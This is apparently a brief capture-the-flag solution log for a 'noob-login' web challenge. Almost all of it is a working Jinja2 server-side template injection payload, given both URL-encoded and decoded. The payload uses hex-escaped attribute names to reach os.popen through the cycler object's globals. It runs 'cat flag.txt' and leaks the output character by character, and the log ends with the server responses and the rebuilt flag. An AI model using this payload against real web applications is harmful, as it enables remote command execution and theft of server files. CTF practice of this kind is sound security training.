$ https://noob-login.ctf.pearlctf.in/?user=%7B%25for+x%2Cy+in+cycler%7Cattr%28%22%5Cx5f%5Cx5fin%5Cx69t%5Cx5f%5Cx5f%22%29%7Cattr%28%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22%29%7Cdictsort%25%7D%7B%25for+w+in+x*%28x%3D%3D%22%5Cx6fs%22%29%25%7D%7B%25for+a+in+y%7Cattr%28%22p%5Cx6fpen%22%29%28%22cat+flag.txt%22%29%7Cattr%28%22read%22%29%28%29%25%7D%7C%7B%25for+d+in+a*%28a%3D%3D%22a%22%29%25%7D+a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22b%22%29%25%7D+b+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22c%22%29%25%7D+c+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22d%22%29%25%7D+d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22e%22%29%25%7D+e+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22f%22%29%25%7D+f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22g%22%29%25%7D+g+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22h%22%29%25%7D+h+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22i%22%29%25%7D+i+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22j%22%29%25%7D+j+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22k%22%29%25%7D+k+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22l%22%29%25%7D+l+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22m%22%29%25%7D+m+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22n%22%29%25%7D+n+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22o%22%29%25%7D+o+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22p%22%29%25%7D+p+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22q%22%29%25%7D+q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22r%22%29%25%7D+r+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22s%22%29%25%7D+s+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22t%22%29%25%7D+t+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22u%22%29%25%7D+u+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22v%22%29%25%7D+v+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22w%22%29%25%7D+w+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22x%22%29%25%7D+x+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22y%22%29%25%7D+y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22z%22%29%25%7D+z+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22A%22%29%25%7D+A+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22B%22%29%25%7D+B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22C%22%29%25%7D+C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22D%22%29%25%7D+D+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22E%22%29%25%7D+E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22F%22%29%25%7D+F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22G%22%29%25%7D+G+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22H%22%29%25%7D+H+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22I%22%29%25%7D+I+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22J%22%29%25%7D+J+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22K%22%29%25%7D+K+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22L%22%29%25%7D+L+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22M%22%29%25%7D+M+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22N%22%29%25%7D+N+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22O%22%29%25%7D+O+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22P%22%29%25%7D+P+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Q%22%29%25%7D+Q+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22R%22%29%25%7D+R+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22S%22%29%25%7D+S+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22T%22%29%25%7D+T+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22U%22%29%25%7D+U+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22V%22%29%25%7D+V+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22W%22%29%25%7D+W+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22X%22%29%25%7D+X+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Y%22%29%25%7D+Y+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22Z%22%29%25%7D+Z+%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D
> {%for x,y in cycler|attr("\x5f\x5fin\x69t\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|dictsort%}{%for w in x*(x=="\x6fs")%}{%for a in y|attr("p\x6fpen")("cat flag.txt")|attr("read")()%}|{%for d in a*(a=="a")%} a {%endfor%}{%for d in a*(a=="b")%} b {%endfor%}{%for d in a*(a=="c")%} c {%endfor%}{%for d in a*(a=="d")%} d {%endfor%}{%for d in a*(a=="e")%} e {%endfor%}{%for d in a*(a=="f")%} f {%endfor%}{%for d in a*(a=="g")%} g {%endfor%}{%for d in a*(a=="h")%} h {%endfor%}{%for d in a*(a=="i")%} i {%endfor%}{%for d in a*(a=="j")%} j {%endfor%}{%for d in a*(a=="k")%} k {%endfor%}{%for d in a*(a=="l")%} l {%endfor%}{%for d in a*(a=="m")%} m {%endfor%}{%for d in a*(a=="n")%} n {%endfor%}{%for d in a*(a=="o")%} o {%endfor%}{%for d in a*(a=="p")%} p {%endfor%}{%for d in a*(a=="q")%} q {%endfor%}{%for d in a*(a=="r")%} r {%endfor%}{%for d in a*(a=="s")%} s {%endfor%}{%for d in a*(a=="t")%} t {%endfor%}{%for d in a*(a=="u")%} u {%endfor%}{%for d in a*(a=="v")%} v {%endfor%}{%for d in a*(a=="w")%} w {%endfor%}{%for d in a*(a=="x")%} x {%endfor%}{%for d in a*(a=="y")%} y {%endfor%}{%for d in a*(a=="z")%} z {%endfor%}{%for d in a*(a=="A")%} A {%endfor%}{%for d in a*(a=="B")%} B {%endfor%}{%for d in a*(a=="C")%} C {%endfor%}{%for d in a*(a=="D")%} D {%endfor%}{%for d in a*(a=="E")%} E {%endfor%}{%for d in a*(a=="F")%} F {%endfor%}{%for d in a*(a=="G")%} G {%endfor%}{%for d in a*(a=="H")%} H {%endfor%}{%for d in a*(a=="I")%} I {%endfor%}{%for d in a*(a=="J")%} J {%endfor%}{%for d in a*(a=="K")%} K {%endfor%}{%for d in a*(a=="L")%} L {%endfor%}{%for d in a*(a=="M")%} M {%endfor%}{%for d in a*(a=="N")%} N {%endfor%}{%for d in a*(a=="O")%} O {%endfor%}{%for d in a*(a=="P")%} P {%endfor%}{%for d in a*(a=="Q")%} Q {%endfor%}{%for d in a*(a=="R")%} R {%endfor%}{%for d in a*(a=="S")%} S {%endfor%}{%for d in a*(a=="T")%} T {%endfor%}{%for d in a*(a=="U")%} U {%endfor%}{%for d in a*(a=="V")%} V {%endfor%}{%for d in a*(a=="W")%} W {%endfor%}{%for d in a*(a=="X")%} X {%endfor%}{%for d in a*(a=="Y")%} Y {%endfor%}{%for d in a*(a=="Z")%} Z {%endfor%}{%endfor%}{%endfor%}{%endfor%}
Basic | p | e | a | r | l || W || s || m | y || p || g | e || s || c | u | r ||| e | n || u | g | h || f || r || y || u |||| p | e | a | r | l || W || s || m | y || p || g | e || s || c | u | r ||| e | n || u | g | h || f || r || y || u |||
Blah blah blah

$ https://noob-login.ctf.pearlctf.in/?user=%7B%25for+x%2Cy+in+cycler%7Cattr%28%22%5Cx5f%5Cx5fin%5Cx69t%5Cx5f%5Cx5f%22%29%7Cattr%28%22%5Cx5f%5Cx5fglobals%5Cx5f%5Cx5f%22%29%7Cdictsort%25%7D%7B%25for+w+in+x*%28x%3D%3D%22%5Cx6fs%22%29%25%7D%7B%25for+a+in+y%7Cattr%28%22p%5Cx6fpen%22%29%28%22cat+flag.txt%22%29%7Cattr%28%22read%22%29%28%29%25%7D%7C%7B%25for+d+in+a*%28a%3D%3D%220%22%29%25%7D+0+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%221%22%29%25%7D+1+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%222%22%29%25%7D+2+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%223%22%29%25%7D+3+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%224%22%29%25%7D+4+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%225%22%29%25%7D+5+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%226%22%29%25%7D+6+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%227%22%29%25%7D+7+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%228%22%29%25%7D+8+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%229%22%29%25%7D+9+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx5f%22%29%25%7D+%5Cx5f+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%21%22%29%25%7D+%21+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%40%22%29%25%7D+%40+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%23%22%29%25%7D+%23+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%3F%22%29%25%7D+%3F+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%24%22%29%25%7D+%24+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%25%22%29%25%7D+%25+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5C%5C%22%29%25%7D+%5C+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22.%22%29%25%7D+.+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%27%22%29%25%7D+%27+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%27%22%27%29%25%7D+%22+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%2B%22%29%25%7D+%2B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx3a%22%29%25%7D+%5Cx3a+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%5Cx2d%22%29%25%7D+%5Cx2d+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%3E%22%29%25%7D+%3E+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%7B%22%29%25%7D+%7B+%7B%25endfor%25%7D%7B%25for+d+in+a*%28a%3D%3D%22%7D%22%29%25%7D+%7D+%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D%7B%25endfor%25%7D
> {%for x,y in cycler|attr("\x5f\x5fin\x69t\x5f\x5f")|attr("\x5f\x5fglobals\x5f\x5f")|dictsort%}{%for w in x*(x=="\x6fs")%}{%for a in y|attr("p\x6fpen")("cat flag.txt")|attr("read")()%}|{%for d in a*(a=="0")%} 0 {%endfor%}{%for d in a*(a=="1")%} 1 {%endfor%}{%for d in a*(a=="2")%} 2 {%endfor%}{%for d in a*(a=="3")%} 3 {%endfor%}{%for d in a*(a=="4")%} 4 {%endfor%}{%for d in a*(a=="5")%} 5 {%endfor%}{%for d in a*(a=="6")%} 6 {%endfor%}{%for d in a*(a=="7")%} 7 {%endfor%}{%for d in a*(a=="8")%} 8 {%endfor%}{%for d in a*(a=="9")%} 9 {%endfor%}{%for d in a*(a=="\x5f")%} \x5f {%endfor%}{%for d in a*(a=="!")%} ! {%endfor%}{%for d in a*(a=="@")%} @ {%endfor%}{%for d in a*(a=="#")%} # {%endfor%}{%for d in a*(a=="?")%} ? {%endfor%}{%for d in a*(a=="$")%} $ {%endfor%}{%for d in a*(a=="%")%} % {%endfor%}{%for d in a*(a=="\\")%} \ {%endfor%}{%for d in a*(a==".")%} . {%endfor%}{%for d in a*(a=="'")%} ' {%endfor%}{%for d in a*(a=='"')%} " {%endfor%}{%for d in a*(a=="+")%} + {%endfor%}{%for d in a*(a=="\x3a")%} \x3a {%endfor%}{%for d in a*(a=="\x2d")%} \x2d {%endfor%}{%for d in a*(a==">")%} > {%endfor%}{%for d in a*(a=="{")%} { {%endfor%}{%for d in a*(a=="}")%} } {%endfor%}{%endfor%}{%endfor%}{%endfor%}
Basic |||||| { || 4 || \x5f ||| \x5f || 4 ||| \x5f || 3 |||| 3 | \x5f ||| 0 |||| \x5f || 0 || \x5f || 0 || ? | } ||||||| { || 4 || \x5f ||| \x5f || 4 ||| \x5f || 3 |||| 3 | \x5f ||| 0 |||| \x5f || 0 || \x5f || 0 || ? | } |
Blah blah blah

$ reconstruct the flag
| p | e | a | r | l |   | W |   | s |   | m | y |   | p |   | g | e |   | s |   | c | u | r |   |   | e | n |   | u | g | h |   | f |   | r |   | y |   | u |   |   |   | p | e | a | r | l |   | W |   | s |   | m | y |   | p |   | g | e |   | s |   | c | u | r |   |   | e | n |   | u | g | h |   | f |   | r |   | y |   | u |   |   |
|   |   |   |   |   | { |   | 4 |   | _ |   |   | _ |   | 4 |   |   | _ |   | 3 |   |   |   | 3 | _ |   |   | 0 |   |   |   | _ |   | 0 |   | _ |   | 0 |   | ? | } |   |   |   |   |   |   | { |   | 4 |   | _ |   |   | _ |   | 4 |   |   | _ |   | 3 |   |   |   | 3 | _ |   |   | 0 |   |   |   | _ |   | 0 |   | _ |   | 0 |   | ? | } |
pearl{W4s_my_p4ge_s3cur3_en0ugh_f0r_y0u?}
